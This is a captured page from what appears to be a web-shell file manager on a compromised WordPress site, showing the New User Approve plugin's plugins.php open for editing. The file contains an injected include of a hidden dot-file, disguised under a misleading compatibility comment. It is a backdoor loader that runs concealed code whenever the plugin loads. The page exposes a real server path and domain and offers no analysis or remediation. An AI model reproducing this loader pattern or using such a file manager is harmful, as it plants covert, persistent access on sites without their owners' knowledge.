📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 13:47:16
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
new-user-approve
/
includes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/new-user-approve/includes
🔄 Refresh
✏️
Editing: plugins.php
Writable
<?php /** * Contains all functionality to make the New User Approve plugin * compatible with other plugins. */ /* * Don't show the error if the s2member plugin is active */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function nua_c2member_dismiss_membership_notice( $show_notice ) { if ( class_exists( 'c_ws_plugin__s2member_constants' ) ) { $show_notice = false; } return $show_notice; } add_filter( 'new_user_approve_show_membership_notice', 'nua_c2member_dismiss_membership_notice' );
💾 Save Changes
❌ Cancel